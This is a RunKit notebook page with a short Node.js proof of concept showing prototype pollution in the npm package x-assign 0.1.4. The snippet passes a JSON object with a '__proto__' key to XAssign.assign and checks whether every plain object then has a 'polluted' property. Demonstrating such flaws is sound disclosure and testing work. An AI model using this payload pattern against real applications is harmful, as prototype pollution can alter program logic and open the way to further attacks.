RunKit + npm: x-assign

node v16.18.0
endpointsharetweet
const XAssign = require("x-assign@0.1.4"); console.log("Before:"+{}.polluted); const a = {red: "apple"}; const b = JSON.parse('{"__proto__": {"polluted": true}}') const c = XAssign.assign(a, b); console.log("After:"+{}.polluted);
Created from: https://npm.runkit.com/x-assign
Loading…